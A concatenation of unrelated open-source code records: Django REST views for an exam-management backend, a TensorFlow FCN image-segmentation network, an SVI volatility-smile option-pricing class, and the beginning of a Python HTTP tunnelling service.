http_method_names = [\"get\", \"post\", \"put\", \"delete\", \"patch\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Answer.objects.all().filter(\n 
question=self.request.query_params.get(\"id\"),\n question__user=self.request.user,\n deleted=False,\n )\n\n return queryset\n\n user = self.request.user\n if user.is_superuser:\n queryset = Answer.objects.all().filter(deleted=False)\n return queryset\n return Answer.objects.all().filter(question__user=user, deleted=False)\n\n def create(self, request, *args, **kwargs):\n\n serializer = self.get_serializer(\n data=request.data, many=isinstance(request.data, list)\n )\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass CourseViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n lookup_field = \"token\" # used to allow delete on /api/courses//\n serializer_class = CourseSerializer\n\n http_method_names = [\"get\", \"post\", \"patch\", \"delete\"]\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n questions_to_parse = request.POST.getlist(\"questions\")\n # https://stackoverflow.com/questions/12101658/how-to-get-an-array-in-django-posted-via-ajax\n\n course = Course(\n name=validated_data[\"name\"],\n description=validated_data[\"description\"],\n questions_number=validated_data[\"questions_number\"],\n token=validated_data[\"token\"],\n author=validated_data[\"author\"],\n )\n course.perfect_mark = self.request.data[\"perfect_mark\"]\n course.good_mark = self.request.data[\"good_mark\"]\n course.satisfactory_mark = self.request.data[\"satisfactory_mark\"]\n if \"perfect_audio\" in self.request.data:\n if self.request.data[\"perfect_audio\"] != \"null\":\n # course.perfect_audio = self.request.data['perfect_audio']\n course.perfect_audio_url = upload_media_file(\n validated_data[\"perfect_audio\"]\n )\n else:\n course.perfect_audio = None\n if \"good_audio\" in self.request.data:\n if self.request.data[\"good_audio\"] != \"null\":\n # course.good_audio = self.request.data['good_audio']\n course.good_audio_url = upload_media_file(validated_data[\"good_audio\"])\n else:\n course.good_audio = None\n if \"satisfactory_audio\" in self.request.data:\n if self.request.data[\"satisfactory_audio\"] != \"null\":\n # course.satisfactory_audio = self.request.data['satisfactory_audio']\n course.satisfactory_audio_url = upload_media_file(\n validated_data[\"satisfactory_audio\"]\n )\n else:\n course.satisfactory_audio = None\n if \"bad_audio\" in self.request.data:\n if self.request.data[\"bad_audio\"] != \"null\":\n # course.bad_audio = self.request.data['bad_audio']\n course.bad_audio_url = upload_media_file(validated_data[\"bad_audio\"])\n else:\n course.bad_audio = None\n\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] != \"null\":\n course.video = self.request.data[\"video\"]\n else:\n course.video = \"\"\n if \"attempts\" in validated_data and self.request.data[\"attempts\"] != \"\":\n course.attempts = self.request.data[\"attempts\"]\n course.save()\n # questions = self.context['request'].data['questions']\n # questions_to_parse = validated_data['questions']\n\n if questions_to_parse:\n for question in questions_to_parse:\n course.questions.add(question)\n\n if \"image\" in validated_data:\n course.image = 
validated_data[\"image\"]\n\n if \"user\" in validated_data:\n user = validated_data[\"user\"]\n else:\n user = self.request.user\n\n user_relation = UserCourseRelation(user=user, course=course, access=1)\n user_relation.save()\n course.save()\n # return course\n return Response(CourseSerializer(course).data, status=status.HTTP_201_CREATED)\n\n def list(self, request):\n serializer = self.get_serializer(data=request.data)\n if type(request.user) == AnonymousUser:\n course = (\n Course.objects.all()\n .filter(token=request.query_params.get(\"token\"))\n .first()\n )\n if not course or not course.demo_allowed:\n return Response(status=status.HTTP_403_FORBIDDEN)\n else:\n timestamp = str(int(time.time()))\n login = \"demo_\" + timestamp\n\n password = \"pass_\" + timestamp\n\n register_resp = requests.post(\n \"http://127.0.0.1:8000/api/register/\",\n data={\"username\": login, \"password\": password},\n )\n\n demo_user_id = register_resp.json()[\"id\"]\n demo_user_profile = Profile.objects.filter(id=demo_user_id).first()\n demo_user_profile.group = -1 # demo group\n demo_user_profile.save()\n register_resp = requests.post(\n \"http://127.0.0.1:8000/token-auth/\",\n data={\"username\": login, \"password\": password},\n )\n\n demo_user_token = register_resp.json()[\"token\"]\n return Response(\n register_resp.json(), status=status.HTTP_401_UNAUTHORIZED\n )\n if request.method == \"GET\":\n\n queryset = Course.objects.all().filter(\n token=request.query_params.get(\"token\")\n )\n return Response(\n [CourseSerializer(course, context={'request': self.request}).data for course in queryset],\n status=status.HTTP_200_OK,\n )\n return Response([], status=status.HTTP_200_OK)\n\n def get_queryset(self):\n if type(self.request.user) == AnonymousUser:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(\n token=self.request.query_params.get(\"token\")\n )\n return queryset\n return Course.objects.all()\n\n def destroy(self, request, *args, **kwargs):\n # if self.request.method == \"DELETE\":\n instance = self.get_object()\n UserCourseRelation.objects.all().filter(course=instance).delete()\n CourseSession.objects.all().filter(course=instance).delete()\n Course.objects.all().get(token=instance.token).delete()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n course = self.get_object()\n if \"name\" in validated_data:\n course.name = validated_data[\"name\"]\n if \"description\" in validated_data:\n course.description = validated_data[\"description\"]\n if \"author\" in validated_data:\n course.author = validated_data[\"author\"]\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n course.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n course.image = validated_data[\"image\"]\n if \"questions_number\" in validated_data:\n course.questions_number = validated_data[\"questions_number\"]\n if \"attempts\" in validated_data:\n course.attempts = validated_data[\"attempts\"]\n if \"perfect_mark\" in validated_data:\n course.perfect_mark = validated_data[\"perfect_mark\"]\n if \"good_mark\" in validated_data:\n course.good_mark = validated_data[\"good_mark\"]\n if \"satisfactory_mark\" in validated_data:\n course.satisfactory_mark = validated_data[\"satisfactory_mark\"]\n questions_to_parse = validated_data[\"questions\"]\n\n course.questions.clear()\n\n if 
questions_to_parse:\n for question in questions_to_parse:\n course.questions.add(question)\n\n course.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass CourseCreatedViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseCreatedSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(user=self.request.user).distinct()\n\n if not queryset:\n return queryset\n for course in queryset:\n queryset_access = UserCourseRelation.objects.all().filter(\n course=course, user=self.request.user, access=1\n )\n\n if not queryset_access:\n queryset = queryset.exclude(id=course.id)\n return queryset\n\n\nclass CourseAddedViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseCreatedSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(user=self.request.user).distinct()\n\n ids = []\n if not queryset:\n return queryset\n for course in queryset:\n queryset_access = UserCourseRelation.objects.all().filter(\n access=0, course=course, user=self.request.user\n )\n\n if not queryset_access:\n queryset = queryset.exclude(id=course.id)\n return queryset\n\n\nclass RelationViewSet(viewsets.ModelViewSet):\n queryset = UserCourseRelation.objects.all()\n serializer_class = RelationSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n # lookup_field = 'token'\n\n def get_queryset(self):\n return None\n\n\nclass RelationUnsubscribeViewSet(viewsets.ModelViewSet):\n queryset = UserCourseRelation.objects.all()\n serializer_class = RelationUnsubscribeSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def create(self, request, *args, **kwargs):\n course = Course.objects.all().get(token=self.request.data[\"token\"])\n relation = UserCourseRelation.objects.filter(user=self.request.user, course=course, access=0)\n relation.delete()\n return Response({\"status\": \"Successfully deleted\"})\n\n\nclass StrictModeViewSet(viewsets.ModelViewSet):\n queryset = StrictMode.objects.all()\n serializer_class = StrictModeSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n # lookup_field = 'id'\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n if self.request.query_params.get(\"token\"):\n usercourse = UserCourseRelation.objects.all().get(\n course__token=self.request.query_params.get(\"token\"), access=1\n )\n queryset = StrictMode.objects.all().filter(user=usercourse.user)\n else:\n queryset = StrictMode.objects.all().filter(user=user)\n\n return queryset\n if user.is_superuser:\n queryset = StrictMode.objects.all()\n return queryset\n return StrictMode.objects.all().filter()\n\n def destroy(self, request, *args, **kwargs):\n\n instance = self.get_object()\n\n self.perform_destroy(instance)\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n # def perform_destroy(self, instance):\n # instance.delete()\n\n\nclass QuestionMediaViewSet(viewsets.ModelViewSet):\n queryset = QuestionMedia.objects.all()\n serializer_class = QuestionMediaSerializer\n permission_classes = 
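# --- Hedged aside (not from the original source): the two get_queryset() loops
# above issue one UserCourseRelation query per course and prune with .exclude(),
# an N+1 pattern. Assuming Django's default reverse accessor name for the
# relation (no related_name is visible in this file), each collapses to one JOIN:
def get_queryset(self):
    # access=1 marks the creator relation per the loops above;
    # the "added" variant in CourseAddedViewSet would filter on access=0
    return Course.objects.filter(
        usercourserelation__user=self.request.user,
        usercourserelation__access=1,
    ).distinct()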
(IsAuthenticated,)\n    http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n\n    def get_queryset(self):\n        user = self.request.user\n        if self.request.method == \"GET\":\n            queryset = QuestionMedia.objects.all().filter(\n                question=self.request.query_params.get(\"id\")\n            )\n\n            return queryset\n        if (\n            user.is_superuser\n        ):  # TODO: either do this for all GETs or delete it from here, no other methods support this logic\n            queryset = QuestionMedia.objects.all()\n            return queryset\n        return QuestionMedia.objects.all().filter()\n\n    def create(self, request, *args, **kwargs):\n        validated_data = self.request.data\n        question = Question.objects.all().get(id=validated_data[\"question\"])\n        mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n        media = QuestionMedia(question=question, mode=mode)\n        if \"audio\" in self.request.data:\n            if self.request.data[\"audio\"] == \"null\":\n                media.audio = None\n            else:\n                media.audio = self.request.data[\"audio\"]\n        if \"video\" in self.request.data:\n            if self.request.data[\"video\"] == \"null\":\n                media.video = None\n            else:\n                media.video = self.request.data[\"video\"]\n        media.save()\n        return Response(status=status.HTTP_200_OK)\n\n    def partial_update(self, request, *args, **kwargs):\n        validated_data = self.request.data\n        media = self.get_object()\n        if \"audio\" in self.request.data:\n            if validated_data[\"audio\"] == \"null\" or not validated_data[\"audio\"]:\n                media.audio = None\n            else:\n                media.audio = self.request.data[\"audio\"]\n        if \"video\" in self.request.data:\n            if validated_data[\"video\"] == \"null\" or not validated_data[\"video\"]:\n                media.video = None\n            else:\n                media.video = self.request.data[\"video\"]\n        media.save()\n        return Response(status=status.HTTP_200_OK)\n\n\nclass HintViewSet(viewsets.ModelViewSet):\n    queryset = Hint.objects.all()\n    serializer_class = HintSerializer\n    permission_classes = (IsAuthenticated,)\n    http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n    lookup_field = \"id\"\n\n    def get_queryset(self):\n        user = self.request.user\n        if self.request.method == \"GET\":\n            queryset = Hint.objects.all().filter(\n                answer=self.request.query_params.get(\"id\")\n            )\n\n            return queryset\n        if (\n            user.is_superuser\n        ):  # TODO: either do this for all GETs or delete it from here, no other methods support this logic\n            queryset = Hint.objects.all()\n            return queryset\n        return Hint.objects.all().filter()\n\n    def create(self, request, *args, **kwargs):\n        validated_data = self.request.data\n        answer = Answer.objects.all().get(id=validated_data[\"answer\"])\n        mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n        hint = Hint(answer=answer, mode=mode)\n        if \"audio\" in self.request.data:\n            if self.request.data[\"audio\"] == \"null\":\n                hint.audio = None\n            else:\n                hint.audio = self.request.data[\"audio\"]\n        if \"video\" in self.request.data:\n            if self.request.data[\"video\"] == \"null\":\n                hint.video = None\n            else:\n                hint.video = self.request.data[\"video\"]\n        if \"text\" in self.request.data:\n            hint.text = self.request.data[\"text\"]\n        hint.save()\n        return Response(status=status.HTTP_200_OK)\n\n    def partial_update(self, request, *args, **kwargs):\n        validated_data = self.request.data\n        answer = Answer.objects.all().get(id=validated_data[\"answer\"])\n        mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n        # hint = Hint(answer = answer, mode = mode)\n        hint = self.get_object()\n        if \"audio\" in self.request.data:\n            if self.request.data[\"audio\"] == \"null\":\n                hint.audio = \"\"\n            else:\n                if self.request.data[\"audio\"] != \"stay\":\n                    hint.audio 
= self.request.data[\"audio\"]\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] == \"null\":\n hint.video = \"\"\n else:\n if self.request.data[\"video\"] != \"stay\":\n hint.video = self.request.data[\"video\"]\n if \"text\" in self.request.data:\n hint.text = self.request.data[\"text\"]\n hint.save()\n return Response(status=status.HTTP_200_OK)\n","repo_name":"Alveona/exam-system","sub_path":"backend/exam_backend/exam_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"18750202897","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\nimport numpy as np\n\nMEANS = [84.00721708, 98.98497608, 106.0256254]\n\ndef _decode_img(feature, shape, dtype):\n image = tf.decode_raw(feature, dtype)\n image_shape = tf.stack(shape)\n\n return tf.reshape(image, image_shape)\n\ndef _parse_image_with_labels(example_proto):\n '''Parses a TFRecord from file to examples'''\n features = {\n 'name': tf.FixedLenFeature([], tf.string),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.string),\n }\n\n parsed_features = tf.parse_single_example(example_proto, features)\n\n height = tf.cast(parsed_features['height'], tf.int32)\n width = tf.cast(parsed_features['width'], tf.int32)\n depth = tf.cast(parsed_features['depth'], tf.int32)\n\n image = _decode_img(\n parsed_features['image'],\n [depth, height, width],\n tf.uint8\n )\n\n image = tf.transpose(image, perm=[1, 2, 0])\n\n # normalisation\n image = tf.cast(image, tf.float32)\n image = image - MEANS\n zeros = tf.equal(image, tf.constant(0., dtype=tf.float32))\n image = tf.where(zeros, tf.zeros_like(image), image)\n label = _decode_img(\n parsed_features['label'],\n [height, width],\n tf.uint8\n )\n \n name = tf.cast(parsed_features['name'], tf.string)\n \n return name, image, label\n\ndef get_from_records(pattern, batch_size, buffer, shuffle=True):\n records = tf.data.Dataset.list_files(pattern, shuffle=shuffle)\n dataset = tf.data.TFRecordDataset(records)\n dataset = dataset.map(lambda x: _parse_image_with_labels(x))\n \n if shuffle:\n # Buffer size is key for random sampling!\n dataset = dataset.shuffle(buffer_size=buffer)\n \n dataset = dataset.batch(batch_size)\n\n return dataset\n\nNUM_OF_CLASSES = 2\n\ndef _bilinear_filter(size):\n factor = (size + 1) // 2\n if size % 2 == 1:\n centre = factor - 1\n else:\n centre = factor - 0.5\n og = np.ogrid[:size, :size]\n return (1 - abs(og[0] - centre) / factor) * \\\n (1 - abs(og[1] - centre) / factor)\n\ndef _upscore_filter(shape):\n h, w, nin, nout = shape\n filt = _bilinear_filter(w) #h, w for square\n weights = np.zeros(shape)\n for l in range(nin):\n weights[:, :, l, l] = filt\n init = tf.constant_initializer(value=weights, dtype=tf.float32)\n up_filt = tf.get_variable(\n name='upscore_filter', initializer=init,\n shape=weights.shape)\n\n return up_filt\n\ndef _expand_label(label, classes):\n # element wise expansion of labels\n label_expand = list(map(lambda x: tf.equal(label, x), classes))\n stack = tf.stack(label_expand, axis=2)\n\n return tf.to_float(stack)\n\ndef batch_expand_labels(labels, classes):\n batch_labels = tf.map_fn(\n lambda x: _expand_label(x, classes),\n labels,\n dtype=tf.float32\n )\n return 
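# --- Hedged usage sketch (not in the original file): wiring get_from_records()
# into a TF1 session loop. The TFRecord glob is a placeholder path.
dataset = get_from_records("data/train-*.tfrecord", batch_size=4, buffer=256)
names, images, labels = dataset.make_one_shot_iterator().get_next()
onehot = batch_expand_labels(labels, classes=list(range(NUM_OF_CLASSES)))

with tf.Session() as sess:
    n, x, y = sess.run([names, images, onehot])
    # images come out mean-subtracted float32, labels one-hot over 2 classes,
    # e.g. x.shape == (4, H, W, 3) and y.shape == (4, H, W, 2)
    print(n[0], x.shape, y.shape)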
batch_labels\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n xentropy = tf.nn.softmax_cross_entropy_with_logits_v2(\n labels=labels, \n logits=logits,\n name='cross_entropy_per_example'\n )\n mean_xentropy = tf.reduce_mean(xentropy, name='cross_entropy')\n tf.add_to_collection('losses', mean_xentropy)\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\n \n return total_loss\n\ndef _conv_relu(name, bottom, nout, ks=[1, 1], strides=[1, 1, 1, 1],\n in_layers=None, trainable=True, return_relu=True):\n \"\"\"\n \"\"\"\n with tf.variable_scope(name) as scope:\n if in_layers is None:\n nin = bottom.shape.as_list()[3]\n else:\n nin = in_layers\n shape = ks + [nin, nout]\n kernel = tf.get_variable(\n 'weights', shape,\n dtype=tf.float32, trainable=trainable)\n conv = tf.nn.conv2d(\n bottom, kernel, strides, padding='SAME',\n name=name)\n biases = tf.get_variable('biases', [nout], trainable=trainable)\n pre_activation = tf.nn.bias_add(\n conv, biases,\n name=name)\n if return_relu:\n relu = tf.nn.relu(\n pre_activation, name=name.replace('conv', 'relu'))\n\n return pre_activation, relu\n\n return pre_activation\n\ndef _max_pool(name, bottom):\n maxp = tf.nn.max_pool(\n bottom, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME', name=name)\n\n return maxp\n\ndef _upscale(name, bottom, nin, nout, out_shape, ks=[1, 1],\n strides=[1, 2, 2, 1], trainable=True):\n with tf.variable_scope(name) as scope:\n shape = ks + [nin, nout]\n kernal = _upscore_filter(shape)\n conv = tf.nn.conv2d_transpose(\n bottom, kernal,\n out_shape, strides,\n padding='SAME', name=name)\n return conv\n\ndef inference(x, in_layers=3):\n # convolution layers\n conv1_1, relu1_1 = _conv_relu('conv1_1', x, 64, ks=[3, 3],\n in_layers=in_layers)\n conv1_2, relu1_2 = _conv_relu('conv1_2', relu1_1, 64, ks=[3, 3])\n pool1 = _max_pool('pool1', relu1_2)\n\n conv2_1, relu2_1 = _conv_relu('conv2_1', pool1, 128, ks=[3, 3])\n conv2_2, relu2_2 = _conv_relu('conv2_2', relu2_1, 128, ks=[3, 3])\n pool2 = _max_pool('pool2', relu2_2)\n\n conv3_1, relu3_1 = _conv_relu('conv3_1', pool2, 256, ks=[3, 3])\n conv3_2, relu3_2 = _conv_relu('conv3_2', relu3_1, 256, ks=[3, 3])\n conv3_3, relu3_3 = _conv_relu('conv3_3', relu3_2, 256, ks=[3, 3])\n pool3 = _max_pool('pool3', relu3_3)\n\n conv4_1, relu4_1 = _conv_relu('conv4_1', pool3, 512, ks=[3, 3])\n conv4_2, relu4_2 = _conv_relu('conv4_2', relu4_1, 512, ks=[3, 3])\n conv4_3, relu4_3 = _conv_relu('conv4_3', relu4_2, 512, ks=[3, 3])\n pool4 = _max_pool('pool4', relu4_3)\n\n conv5_1, relu5_1 = _conv_relu('conv5_1', pool4, 512, ks=[3, 3])\n conv5_2, relu5_2 = _conv_relu('conv5_2', relu5_1, 512, ks=[3, 3])\n conv5_3, relu5_3 = _conv_relu('conv5_3', relu5_2, 512, ks=[3, 3])\n pool5 = _max_pool('pool5', relu5_3)\n\n # Fully convolutional with dropout\n fc6, relu6 = _conv_relu('fc6', pool5, 4096, ks=[7, 7])\n drop6 = tf.nn.dropout(relu6, keep_prob=.5)\n fc7, relu7 = _conv_relu('fc7', drop6, 4096, ks=[1, 1])\n drop7 = tf.nn.dropout(relu7, keep_prob=.5)\n\n # Skips\n fc7_score = _conv_relu(\n '7_score', drop7,\n NUM_OF_CLASSES, return_relu=False)\n pool4_score = _conv_relu(\n 'pool4_score', pool4,\n NUM_OF_CLASSES, return_relu=False)\n pool4_nin = pool4_score.get_shape()[3].value\n fc7_upscore = _upscale(\n 'upscale_pool4', fc7_score,\n pool4_nin, NUM_OF_CLASSES,\n tf.shape(pool4_score), ks=[4, 4])\n fuse_pool4 = tf.add(pool4_score, fc7_upscore, name='fuse_pool4')\n\n pool3_score = _conv_relu(\n 'pool3_score', pool3,\n NUM_OF_CLASSES, return_relu=False)\n pool3_nin = 
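    # --- Hedged aside: a quick numeric check of _bilinear_filter() above. For
    # size=4 the centre is 1.5, so the 1-D profile is [0.25, 0.75, 0.75, 0.25]:
    #
    #     k = _bilinear_filter(4)
    #     k[0]    == [0.0625, 0.1875, 0.1875, 0.0625]   # 0.25 * profile
    #     k[1, 1] == 0.5625                             # 0.75 * 0.75
    #
    # i.e. the 2-D kernel is the outer product of the 1-D profile, and a
    # stride-2 conv2d_transpose initialised with it reproduces bilinear
    # upsampling, which is exactly how _upscale() uses it.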
pool3_score.get_shape()[3].value\n fuse_pool4_upscore = _upscale(\n 'upscale_pool3', fuse_pool4,\n pool3_nin, NUM_OF_CLASSES,\n tf.shape(pool3_score), ks=[4, 4])\n fuse_pool3 = tf.add(\n pool3_score, fuse_pool4_upscore,\n name='fuse_pool3')\n\n # Upscale to image size\n shape = tf.shape(x)\n out_shape = tf.stack([shape[0], shape[1], shape[2], NUM_OF_CLASSES])\n score = _upscale(\n 'upscale_orig', fuse_pool3,\n pool3_nin, NUM_OF_CLASSES,\n out_shape, ks=[16, 16], strides=[1, 8, 8, 1])\n\n return score\n\ndef train(total_loss, learning_rate):\n op = tf.train.AdamOptimizer(learning_rate=learning_rate)\n grads = op.compute_gradients(total_loss, var_list=None)\n return op.apply_gradients(grads)\n","repo_name":"dspix/tf-practicals","sub_path":"code/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":7850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42632437008","text":"import numpy as np\nfrom . import opt_smile_abc as smile\nfrom . import bsm\n\n\nclass Svi(smile.OptSmileABC):\n \"\"\"\n Stochastic Volatility-inspired (SVI) model by Gatheral.\n\n References\n - Gatheral J, Jacquier A (2013) Arbitrage-free SVI volatility surfaces. arXiv:12040646 [q-fin]\n \"\"\"\n\n vov, rho, smooth, shift = 0.4, -0.4, 0.1, 0.0\n\n def __init__(self, sigma=0.04, vov=0.4, rho=-0.4, smooth=0.1, shift=0.0, intr=0.0, divr=0.0, is_fwd=False):\n \"\"\"\n Raw SVI parametrization\n\n Args:\n sigma: level (a)\n vov: vol-of-vol (b)\n rho: rotation (rho)\n smooth: smoothness (sigma)\n shift: translation (m)\n intr: interest rate (domestic interest rate)\n divr: dividend/convenience yield (foreign interest rate)\n is_fwd: if True, treat `spot` as forward price. False by default.\n \"\"\"\n\n self.sigma, self.vov, self.rho, self.smooth, self.shift = sigma, vov, rho, smooth, shift\n super().__init__(sigma, intr=intr, divr=divr, is_fwd=is_fwd)\n\n def base_model(self, sigma=None):\n base_model = bsm.Bsm(sigma, intr=self.intr, divr=self.divr, is_fwd=self.is_fwd)\n return base_model\n\n def vol_for_price(self, strike, spot, texp):\n fwd = self.forward(spot, texp)\n money = np.log(strike / fwd) - self.shift\n vol = np.sqrt(self.sigma + self.vov * (self.rho * money + np.sqrt(money**2 + self.smooth**2)))\n return vol\n\n @classmethod\n def init_from_heston(cls, sigma, vov=0.8, rho=-0.7, mr=0.5, theta=None, texp=1.0, intr=0.0, divr=0.0, is_fwd=False):\n \"\"\"\n SVI initalization with equivalent Heston model by Gatheral & Jacquier (2011)\n\n Args:\n sigma: Heston sigma\n vov: Heston vov\n rho: Heston rho\n mr: Heston mr\n theta: Heston theta\n texp: time to expiry\n intr: interest rate (domestic interest rate)\n divr: dividend/convenience yield (foreign interest rate)\n is_fwd: if True, treat `spot` as forward price. False by default.\n\n Returns: model\n\n References:\n - Gatheral J, Jacquier A (2011) Convergence of Heston to SVI. Quantitative Finance 11:1129–1132. 
https://doi.org/10.1080/14697688.2010.550931\n \"\"\"\n\n theta = sigma if theta is None else theta\n\n rhoc2 = 1 - rho**2\n w1 = np.sqrt((2*mr - rho*vov)**2 + vov**2 * rhoc2) - (2*mr - rho*vov)\n w1 *= (4*mr*theta) / (vov**2 * rhoc2)\n w2 = sigma / (mr * theta)\n sigma_ = w1 * rhoc2 / 2\n vov_ = (w1 * w2) / (2 * texp)\n shift = - rho * texp / w2\n smooth = np.sqrt(rhoc2) * texp / w2\n m = cls(sigma_, vov=vov_, rho=rho, smooth=smooth, shift=shift, intr=intr, divr=divr, is_fwd=is_fwd)\n\n return m\n\n def price(self, strike, spot, texp, cp=1):\n vol = self.vol_for_price(strike, spot, texp)\n m_vol = self.base_model(vol)\n price = m_vol.price(strike, spot, texp, cp=cp)\n return price\n","repo_name":"PyFE/PyFENG","sub_path":"pyfeng/svi.py","file_name":"svi.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"65"} +{"seq_id":"39741351508","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nfrom common_func import *\nimport queue\n# import ssl\nimport base64\n\nclass http_service:\n def __init__(self,cfg):\n self.cfg = cfg\n\n self.customer_listen_addr = split_host(cfg['customer'])\n\n self.socketbridge = HttpBridge(\"http\")\n self.socketbridge.start_as_daemon()\n\n self.run_master(None,self.customer_listen_addr)\n\n def updateconfig(self,cfg):\n self.cfg = cfg\n\n to_master = split_host(cfg['to_master'])\n hostdict = {}\n\n for item in cfg['host']:\n iteminfo = {}\n iteminfo['port'] = to_master[1]\n if item.get('auth'):\n iteminfo['username'] = item['auth']['username']\n iteminfo['password'] = item['auth']['password']\n if self.customer_listen_addr[1] == 80:\n hostdict['http://' + item['domain']] = iteminfo\n else:\n hostdict['http://' + item['domain'] + ':' + str(self.customer_listen_addr[1])] = iteminfo\n if self.socketbridge:\n self.socketbridge.updateconfig(hostdict)\n\n def dispose(self):\n if self.master:\n self.master.dispose()\n\n def run_master(self,communicate_addr, customer_listen_addr):\n log.info(\"http_service customer from: {}\".format(\n fmt_addr(customer_listen_addr)))\n\n self.master = HTServer(customer_listen_addr, communicate_addr,None,self.socketbridge)\n self.master.serve_forever()\n\n\nclass https_service:\n pemfile = 'serverssl/ssl.crt' # 服务证书公钥\n keyfile = 'serverssl/ssl.key' # 服务证书密钥\n\n def __init__(self,cfg):\n self.cfg = cfg\n self.communicate_addr = split_host(cfg['master'])\n self.customer_listen_addr = split_host(cfg['customer'])\n self.SECRET_KEY = cfg['secretkey']\n\n hostdict = {}\n hostdict['https://hehui.ngrokhk.linkbus.xyz:8443'] = 10014\n self.socketbridge = HttpBridge(hostdict,\"https\")\n self.socketbridge.start_as_daemon()\n\n self.pkg = CtrlPkg()\n self.pkg.recalc_crc32(self.SECRET_KEY)\n\n logging.info(\n \"main_master,{},{},id:{},self.pkg:{}\".format(cfg['master'], self.SECRET_KEY, id(self), id(self.pkg)))\n\n self.run_master(self.communicate_addr,self.customer_listen_addr,self.pkg)\n\n def run_master(self,communicate_addr, customer_listen_addr,pkg):\n log.info(\"http_service from: {} customer from: {}\".format(\n fmt_addr(communicate_addr), fmt_addr(customer_listen_addr)))\n\n self.master = HTServer(customer_listen_addr, communicate_addr,True,pkg,self.socketbridge)\n self.master.serve_forever()\n\nclass HTServer:\n def __init__(self, customer_listen_addr, communicate_addr=None,\n ssl=None, socketbridge=None,_listening_sockets=None):\n \"\"\"\n\n :param customer_listen_addr: equals to the -c/--customer param\n :param communicate_addr: equals to the -m/--master 
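# --- Hedged usage sketch for the Svi class above (illustrative values only,
# with the class in scope):
import numpy as np

m = Svi(sigma=0.04, vov=0.4, rho=-0.4, smooth=0.1, shift=0.0)
strikes = np.array([80.0, 100.0, 120.0])
vols = m.vol_for_price(strikes, spot=100.0, texp=1.0)   # smile from raw-SVI params
calls = m.price(strikes, spot=100.0, texp=1.0, cp=1)    # BSM prices at those vols
# at the money, money = 0, so vol = sqrt(0.04 + 0.4 * 0.1) ~= 0.283

# or start from an equivalent Heston parameter set (Gatheral & Jacquier 2011):
m2 = Svi.init_from_heston(sigma=0.04, vov=0.8, rho=-0.7, mr=0.5, texp=1.0)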
param\n \"\"\"\n\n # self.ssl = ssl\n\n self._stopped = {\"stop\":False}\n\n self._listening_sockets = []\n self.thread_pool = {}\n self.thread_pool[\"spare_slaver\"] = {}\n self.thread_pool[\"working_slaver\"] = {}\n\n self.working_pool = {}\n\n self.socket_bridge = socketbridge\n\n # a queue for customers who have connected to us,\n # but not assigned a slaver yet\n self.pending_customers = queue.Queue()\n\n # self.communicate_addr = communicate_addr\n\n\n\n # prepare Thread obj, not activated yet\n self.customer_listen_addr = customer_listen_addr\n _fmt_communicate_addr = fmt_addr(self.customer_listen_addr)\n\n self.thread_pool[\"listen_customer\"] = threading.Thread(\n target=self._listen_customer,\n name=\"listen_customer-{}\".format(_fmt_communicate_addr),\n daemon=True,\n )\n\n\n # prepare assign_slaver_daemon\n self.thread_pool[\"assign_slaver_daemon\"] = threading.Thread(\n target=self._assign_slaver_daemon,\n name=\"assign_slaver_daemon-{}\".format(_fmt_communicate_addr),\n daemon=True,\n )\n\n def dispose(self):\n self._stopped['stop'] = True\n 